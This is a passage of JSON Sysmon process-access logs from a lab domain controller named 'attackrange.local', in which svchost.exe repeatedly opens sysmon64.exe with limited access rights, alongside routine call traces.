C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.814","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.814\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 